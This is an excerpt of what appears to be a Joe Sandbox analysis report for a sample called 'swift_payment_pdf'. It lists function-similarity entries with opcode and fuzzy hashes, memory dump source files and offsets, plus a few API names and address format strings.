                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                  • Instruction ID: 9f6f24588f97259003c56aa60f529fd5340b36151ffd9b7733dabfe0c06b2075
                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                  • Instruction Fuzzy Hash: 92F0F633247A239BD7735A9D4840B6BAAD98FD1A6CF1A1035F2099B605CA68ED0297D0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62d2f208a6ccb9203a3e297153bf87ba9af641b723a9ed10024b427618ec44df
                  • Instruction ID: b862a6837bb544f8736ceff5921e2d835dc07fa796b69aea26e603de005474fc
                  • Opcode Fuzzy Hash: 62d2f208a6ccb9203a3e297153bf87ba9af641b723a9ed10024b427618ec44df
                  • Instruction Fuzzy Hash: 6F017C71A0021AAFCB04EFADD451AAEB7F8EF58304F10802AF905E7350D674AA018BA0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 567d753a52d3b6c443fd7f960329c48001c67215b6eae5f2b59fce51723a22c8
                  • Instruction ID: 89f4eecea71f511901e31745bfe2d4826ae2404d904d928601a81f73024e0ddf
                  • Opcode Fuzzy Hash: 567d753a52d3b6c443fd7f960329c48001c67215b6eae5f2b59fce51723a22c8
                  • Instruction Fuzzy Hash: AF012171A00219AFDB04DFADD55199EB7F8EF58304F50805AE915E7390D6749D018BA4
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                  • Instruction ID: 5fa876e6e09156c5f69466e9d597c423736bd658076a61101f232f51bfee13f7
                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                  • Instruction Fuzzy Hash: F601F432204689DBE322A71DC805F99FB9DFF51B5CF0880A9FA149BAA1D679CD01C324
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7beb36a2434da397c817ed88e4a2d5041708cd800502ce5e2587d9817984d61a
                  • Instruction ID: d95d853d5577de2a8aa34d02b935945b3e63cb7a2af1b3fa2d922d37e06b11f7
                  • Opcode Fuzzy Hash: 7beb36a2434da397c817ed88e4a2d5041708cd800502ce5e2587d9817984d61a
                  • Instruction Fuzzy Hash: 67017C71A00259ABCF00DFADD841AAEBBB8AF58314F14405AE901A7390D734EA02CBA5
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                  • Instruction ID: e1ebfe9cedf8d27d20d54e364b66ec08c70ded3a1c562a3da7367c11b49b65f5
                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                  • Instruction Fuzzy Hash: 79F01DB320001DBFEF019F99DD81DEF7B7EEB592A8B104125FA11A2160D635DD21ABA0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5ef2773ec3e12a1a8cc6e15033d889226699d42925a3c0396c45987329bd722c
                  • Instruction ID: 56ba13a03c518f2b449169ec25c270e50e4f4a67777b916e4ca7a6758b838253
                  • Opcode Fuzzy Hash: 5ef2773ec3e12a1a8cc6e15033d889226699d42925a3c0396c45987329bd722c
                  • Instruction Fuzzy Hash: 6E018536100209EBCF129F84E940EDA3F66FB4C668F068101FE186A220C736DA70EB81
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1b1b03d38fec90233d6b8f24ea7dba7ca4742569eedba16c888368eeeea45ef
                  • Instruction ID: 89dc4696a0b2c568e9c49b7f0384ff6ffd002a9533f651df3b5a03f27c23df65
                  • Opcode Fuzzy Hash: f1b1b03d38fec90233d6b8f24ea7dba7ca4742569eedba16c888368eeeea45ef
                  • Instruction Fuzzy Hash: FFF024712052519BF350A61D9C02F2272DAFBD465CF25902AEB098B6D1E970EC01C394
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9f176b161a4d2bffc64ca62d0840196aad1ac282335948e51b0b602489d1d953
                  • Instruction ID: d8c0bff1b47b24ae75343b8b6fb83acde636ac16e53017b3fdc7397ee1152761
                  • Opcode Fuzzy Hash: 9f176b161a4d2bffc64ca62d0840196aad1ac282335948e51b0b602489d1d953
                  • Instruction Fuzzy Hash: C401A9B0204785DFF723A76CCD59F263798BB50F4CF484154BA418B9D6D728D8028224
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                  • Instruction ID: 4c73529b273ebd20c5db4fcb11b6273c35bc1c94aaf666e59ba96916fed21a09
                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                  • Instruction Fuzzy Hash: 57F0E935341A1347EB36AA2E9410B2BA6D5DF90944B05853E9705CB680EF20D810C780
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                  • Instruction ID: a4a4546d99e521cd72e72a0e88cd3b3ba6db3b5d109f2a5749bb33a4bacb7cd6
                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                  • Instruction Fuzzy Hash: BCF05E337116629BE7229A4EEC81F16BFACBFD5E64F190075B6089F664C760EC0187D0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 61f952992a62ccd11bdb8b77aee41f0c41e9851b1bd3cac7d521fe63a6bcab48
                  • Instruction ID: 49c828d23846e812c424126450e0258d4ca69d5b051072ef29cdb8226ab74dbc
                  • Opcode Fuzzy Hash: 61f952992a62ccd11bdb8b77aee41f0c41e9851b1bd3cac7d521fe63a6bcab48
                  • Instruction Fuzzy Hash: EDF0A4716153449FC710EF6CC542E1ABBE8FF58714F40465EB898DB394E634E901C756
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                  • Instruction ID: 56a2cd2dbcc246b895399172406d463f3562cbfd55f113a19ad36dbda266bca4
                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                  • Instruction Fuzzy Hash: D6F0B472610204AFE718EB25CC05F96BAEDEF98348F248078A545E7274FAB1ED41C655
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5be1634667e1baa5e8d90662748a2d1cd90256143212ffe7c86c28625a197f0a
                  • Instruction ID: 6dc96334eea9616960a630a5414d4476e93ff8cf99087b9bdfb2c6442ccc12aa
                  • Opcode Fuzzy Hash: 5be1634667e1baa5e8d90662748a2d1cd90256143212ffe7c86c28625a197f0a
                  • Instruction Fuzzy Hash: 89F0C270A1024DEFCB04EFA9D511A5EB7B4FF18304F008059B905EB385DA34EA01CB50
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6d9679d0e6c1ca533b2b9fafaac58f3125dcc611831e675d5ddfc52252910560
                  • Instruction ID: 297461f1aa58e2b4a9d7b2e9e2d0af3f68eb530f32512715bc6c5a94a705fd91
                  • Opcode Fuzzy Hash: 6d9679d0e6c1ca533b2b9fafaac58f3125dcc611831e675d5ddfc52252910560
                  • Instruction Fuzzy Hash: E4F0F0319022E49FE7AA8B1CC804F617FC89B00E3CF08886ACD6D83502F725D8C0C600
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2516a12490c3693df8e4472835e13e36a19a1e8a784adb06a520e5c9f1aa79e3
                  • Instruction ID: b528759104f076cc19619e8cdc98d8a4bc3c8cd74ae223ac0f3db0cc3153142b
                  • Opcode Fuzzy Hash: 2516a12490c3693df8e4472835e13e36a19a1e8a784adb06a520e5c9f1aa79e3
                  • Instruction Fuzzy Hash: 69F0273E4196C017CB336B2D64602D27B54A752010F0A145FD4A15733DC5BD88C3C320
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4322326fb93daf86a1ad23b0a1cbd1e56e4f823b55077974e261ca1e78dee282
                  • Instruction ID: e7af87175570de73000f12d8d4f428b96b9547ccc847c3580399ac449072dbe5
                  • Opcode Fuzzy Hash: 4322326fb93daf86a1ad23b0a1cbd1e56e4f823b55077974e261ca1e78dee282
                  • Instruction Fuzzy Hash: BAF0EC715117A59FE722BB2CC148BA1BBE8EB807BCF0CB436D44687912C674F880CA70
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                  • Instruction ID: 84cbb5935f17a9ccea4f7e7cbcb44a27711523b309acde2517c52a4bde902359
                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                  • Instruction Fuzzy Hash: 12E0D832300A012BEB11AE5D8CC4F47776EDFD2B28F04407DB5045F251C9E2DC19C2A4
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                  • Instruction ID: 11ead02120ae97eb1eee14f5c15848b08f5629e322b4d11aef4ac3e06d49e0e1
                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                  • Instruction Fuzzy Hash: ECF030B21083289FE3219F09D949F52BBFCEB15368F45C025E6099B5A1D37AEC40CBA4
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                  • Instruction ID: afbbd38b5470d9ee17cd97358c9ff2eb7af58461551f2d50f93f802d477c2397
                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                  • Instruction Fuzzy Hash: B1F0E5392087459FDB1ACF2AD050ED57BA8FB51758F000065FC468B351D732E982CB54
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                  • Instruction ID: f4c3103ed15c15c2757898b9364115ff42abbd1bbd63cf70acd57f92f3479849
                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                  • Instruction Fuzzy Hash: 54E0923224434AEBE7213B598800B66B6A99BD07A4F154429E2448F950DB78DC40C798
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c618cfa03723d7ee8ca9fd1dc0bb17dce9b260b7483daa990e5b986301915fa2
                  • Instruction ID: 57d40edd5663ed872173eac6a87bfbf6983f757848467a0ac9d0ac074ba134d7
                  • Opcode Fuzzy Hash: c618cfa03723d7ee8ca9fd1dc0bb17dce9b260b7483daa990e5b986301915fa2
                  • Instruction Fuzzy Hash: B8F0A031A255B14FE762D76CD248B6677E4EB10A34FAE0566D40087A6AC730DCC0C650
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                  • Instruction ID: 96ebcec0942897cbb22c4ec54dc9bcfefd5e769674089818590611284edf93de
                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                  • Instruction Fuzzy Hash: 5BE0DF72A00210FBDB21A79A8D06F9ABEACDB90EA8F054068B700E7090E530DE04C690
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                  • Instruction ID: 2522b4742315d17ce66a330c4dbbddd2d1cc7a6ac36e67e8a423261b7878774f
                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                  • Instruction Fuzzy Hash: 4DE09B316403608BCB258A1EC144A53B7E8DFA5660FA5806FE90547722C2F1F8C2C6D0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3d430d7b5981f6307a29aaa136732464667ee08196178178820216ff84a6080f
                  • Instruction ID: 6f4cc60e720d6f2577fbd299ab41719625f331ec54d12d49de9d8253d2c3f29e
                  • Opcode Fuzzy Hash: 3d430d7b5981f6307a29aaa136732464667ee08196178178820216ff84a6080f
                  • Instruction Fuzzy Hash: B6E09232100A94ABC722BB2DDD02F8B77AAEB60778F014515B519571A4CA74A850C798
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                  • Instruction ID: be239d85fb4d919b5e17688c6d1e1da10ee74a94eca5b4ca2fffffacdada74bd
                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                  • Instruction Fuzzy Hash: C2E06D31010B11DBEB326B2ED808B577AE0AF50715F258839A09A025F0C7B49880CA40
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                  • Instruction ID: f2e3d37e3c9509ae9d7524dfed05997dcc48f8da00eed8b0ed8ffa6493f8accb
                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                  • Instruction Fuzzy Hash: 37E0C2353003059FE715CF19D084B62BBB6BFD5A14F28C068A9488F605EB32E842CB40
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                  • Instruction ID: b4db76f4d94450e8ae96ecbd0e2b1d2deafdf0714afc16bb769019509a514f63
                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                  • Instruction Fuzzy Hash: 1AE08C31401A14EFDF322E59DC00F5276E9FB54B28F104869E085164A887B0B881DA44
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d898971bd99017263d260cf3f2564fe2a01a0083a80a06f6bc945d3d9637c59c
                  • Instruction ID: ff70ce315fc61abf48ee9651e7d49c7600383d98839c4381ddeb0f8d388c1fef
                  • Opcode Fuzzy Hash: d898971bd99017263d260cf3f2564fe2a01a0083a80a06f6bc945d3d9637c59c
                  • Instruction Fuzzy Hash: 54E0C233100590ABC712FB5DDD11F4A73AEEFA5774F014121F954872A8CA64AC40C798
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                  • Instruction ID: b1e3f48d75f4a3f4f7a2fd130c90c258e94e9f306f3838c0b18ec5ba752bafa9
                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                  • Instruction Fuzzy Hash: CFE04F33121B1887D728EE18D511A62B7A9EB45720B09462AA61347780C534E544C794
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                  • Instruction ID: 8e154679c7d0cc6a75219f0ab22c36fd2a2791661861b573ee0d3b25a14796df
                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                  • Instruction Fuzzy Hash: 93D05E76511A50AFD7329F1FEA04C13BBF9FBC4B10709062EA54583924C670A806CBA0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                  • Instruction ID: 24b6c7d0fd7d54e43f41be81eb601977b65e4280a0b264be161bd2799914c79d
                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                  • Instruction Fuzzy Hash: 7AD0A932204620ABDB32AA1CFC00FC333E9BB88B28F060459B008C7054C3A0AC81CB84
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                  • Instruction ID: d0fb033dd0ecef58c59e88516fba06dfe7b8867e48115edc934c4137a5ba73d8
                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                  • Instruction Fuzzy Hash: 22E0EC359506849BDF52DF5DC640F9ABBB9BB94F44F150068A5085B664C628AD00CB40
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                  • Instruction ID: 31ff7206389a943e3ea252079dd7571ec9af46e9321effa503eca8436a1235a0
                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                  • Instruction Fuzzy Hash: E1D0223221703093CF285A5A6800F637949AB80A98F0A002CB40B93C04C0048C42D2E0
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                  • Instruction ID: be73d7bfa83681e058e72375e29ede053bd33206d1c1bb2c2f2d5dd0d2899a53
                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                  • Instruction Fuzzy Hash: BAD012371D054DBBCB119F66DC01F957BA9E764BA0F448020B508875A0C67AE950D584
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c6f0074b0e4abe07f377344b0f1f4c579b6c476baef67e8f1ff214a43c4a4c8
                  • Instruction ID: b17d7a85ff444a4bf3b56180c3da44676ebc42e009183c1cf088d654f7ace789
                  • Opcode Fuzzy Hash: 4c6f0074b0e4abe07f377344b0f1f4c579b6c476baef67e8f1ff214a43c4a4c8
                  • Instruction Fuzzy Hash: 78D0C734555605DBEF16DF59C511D6EB674FB54B48B4010ACFF0561524D32ADD01C750
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction ID: 6d0375a96d14577e55aa311401aea41b990765c10590e6a1f096928c127d85d2
                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction Fuzzy Hash: 1ED09235212A80CFD61A8B0CC5A5B1533A8BB44A48F814490E542CBB26E668D940CA00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
                  • Instruction ID: c164b3e90e664baf9efa8afa7e33de3550cf97230e246d936597df8aac0599bb
                  • Opcode Fuzzy Hash: 614dc0bfb93aa0b347b32f704f8c35ac257e8ad9d88fde1976a949fff0eed3b3
